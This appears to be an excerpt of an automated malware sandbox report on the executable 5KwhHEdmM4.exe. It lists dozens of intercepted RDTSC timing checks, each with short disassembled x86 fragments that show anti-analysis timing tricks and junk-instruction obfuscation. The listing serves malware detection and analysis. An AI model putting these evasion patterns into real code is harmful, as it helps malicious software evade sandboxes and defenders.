Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B9140 second address: 16B914A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F10C4818116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B914A second address: 16B914E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B914E second address: 16B9162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnp 00007F10C4818118h 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C3A7C second address: 16C3A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C3A82 second address: 16C3A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C9FBE second address: 16C9FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C9FC2 second address: 16C9FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F10C481811Ah 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007F10C4818116h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C9FDE second address: 16C9FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA245 second address: 16CA26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F10C4818116h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F10C4818128h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA26C second address: 16CA270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA270 second address: 16CA276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA276 second address: 16CA280 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F10C4816DFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA535 second address: 16CA539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA97D second address: 16CA9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F10C4816DF6h 0x0000000a popad 0x0000000b jl 00007F10C4816DFAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jbe 00007F10C4816E08h 0x0000001b jmp 00007F10C4816E02h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F10C4816E06h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0F7F second address: 16D0F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0F85 second address: 16D0F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0F8C second address: 16D0FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F10C4818116h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F10C4818120h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F10C4818125h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push ebx 0x00000020 js 00007F10C4818116h 0x00000026 ja 00007F10C4818116h 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0FD4 second address: 16D0FD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D114A second address: 16D114E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D114E second address: 16D1154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D1154 second address: 16D1181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F10C481811Eh 0x0000000e jmp 00007F10C4818125h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1712267 second address: 171226C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 171226C second address: 1712271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1712271 second address: 1712277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1712277 second address: 171227F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E4F52 second address: 15E4F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10C4816DFDh 0x00000008 jns 00007F10C4816DF6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 jmp 00007F10C4816DFDh 0x00000017 jns 00007F10C4816DF6h 0x0000001d pop ecx 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 pop eax 0x00000025 jl 00007F10C4816DF6h 0x0000002b jnc 00007F10C4816DF6h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E4F94 second address: 15E4F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717AED second address: 1717AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717AF3 second address: 1717B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F10C481811Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F10C481811Dh 0x00000014 jmp 00007F10C4818128h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c jmp 00007F10C481811Dh 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jp 00007F10C4818116h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717B48 second address: 1717B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717B4C second address: 1717B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717B52 second address: 1717B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F2273 second address: 17F2277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F2277 second address: 17F227D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1445 second address: 17F1449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1449 second address: 17F144F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F144F second address: 17F147E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F10C481811Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4818129h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F147E second address: 17F149C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E04h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F149C second address: 17F14A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F14A0 second address: 17F14A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1626 second address: 17F164E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F10C4818125h 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F164E second address: 17F1654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1654 second address: 17F165D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F165D second address: 17F1663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1663 second address: 17F1667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1667 second address: 17F166B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1DEC second address: 17F1DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F10C4818116h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1DF8 second address: 17F1DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1DFE second address: 17F1E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10C481811Eh 0x0000000a pushad 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F10C4818116h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1E20 second address: 17F1E26 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1E26 second address: 17F1E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1F9F second address: 17F1FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C32 second address: 17F7C81 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F10C4818118h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D1F14h] 0x0000002e push dword ptr [ebp+122D2FDAh] 0x00000034 xor edx, dword ptr [ebp+122D37ADh] 0x0000003a call 00007F10C4818119h 0x0000003f pushad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C81 second address: 17F7C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C87 second address: 17F7C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C90 second address: 17F7C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C94 second address: 17F7CA9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jl 00007F10C481811Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7CA9 second address: 17F7CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 popad 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F10C4816E03h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F10C4816DF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7CD5 second address: 17F7CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F95A6 second address: 17F95AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280033 second address: 7280037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280037 second address: 728003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728003B second address: 7280049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280049 second address: 728004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728004D second address: 7280053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280053 second address: 72800A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f pushfd 0x00000010 jmp 00007F10C4816E07h 0x00000015 or si, 6BBEh 0x0000001a jmp 00007F10C4816E09h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800A4 second address: 72800A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800A9 second address: 72800E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F10C4816DFDh 0x0000000a and ch, FFFFFFF6h 0x0000000d jmp 00007F10C4816E01h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F10C4816DFDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800E4 second address: 72800EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800EA second address: 728012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f movsx ebx, si 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 sub esp, 18h 0x00000019 jmp 00007F10C4816E09h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F10C4816DFDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728012C second address: 728019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 jmp 00007F10C4818123h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F10C4818129h 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F10C481811Eh 0x00000019 mov ebx, dword ptr [eax+10h] 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 push edi 0x00000021 mov esi, 324ECAE5h 0x00000026 pop esi 0x00000027 popad 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F10C481811Ah 0x00000032 add al, FFFFFFF8h 0x00000035 jmp 00007F10C481811Bh 0x0000003a popfd 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728019D second address: 7280213 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F10C4816E08h 0x00000008 sbb cx, 0D58h 0x0000000d jmp 00007F10C4816DFBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, cx 0x00000018 popad 0x00000019 mov dword ptr [esp], esi 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F10C4816E00h 0x00000023 sub cx, 17B8h 0x00000028 jmp 00007F10C4816DFBh 0x0000002d popfd 0x0000002e mov ecx, 3A52A3EFh 0x00000033 popad 0x00000034 mov esi, dword ptr [772406ECh] 0x0000003a pushad 0x0000003b mov ecx, 14E521E7h 0x00000040 mov dx, si 0x00000043 popad 0x00000044 test esi, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280213 second address: 7280217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280217 second address: 7280232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280232 second address: 7280238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280238 second address: 728023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728023C second address: 7280259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F10C4818F2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280259 second address: 7280274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280274 second address: 72802BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7DFAh 0x00000007 mov dh, 7Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d jmp 00007F10C481811Ah 0x00000012 push eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ecx 0x00000016 mov esi, ebx 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b mov edx, 2FF38314h 0x00000020 mov si, bx 0x00000023 popad 0x00000024 call dword ptr [77210B60h] 0x0000002a mov eax, 766BE5E0h 0x0000002f ret 0x00000030 jmp 00007F10C481811Fh 0x00000035 push 00000044h 0x00000037 pushad 0x00000038 mov cx, CF6Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e mov edi, eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72802BD second address: 7280303 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F10C4816E00h 0x0000000f popad 0x00000010 mov cl, 49h 0x00000012 popad 0x00000013 push ebx 0x00000014 jmp 00007F10C4816E06h 0x00000019 mov dword ptr [esp], edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F10C4816DFAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280303 second address: 7280307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280307 second address: 728030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728030D second address: 728031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C481811Dh 0x00000009 rdtsc
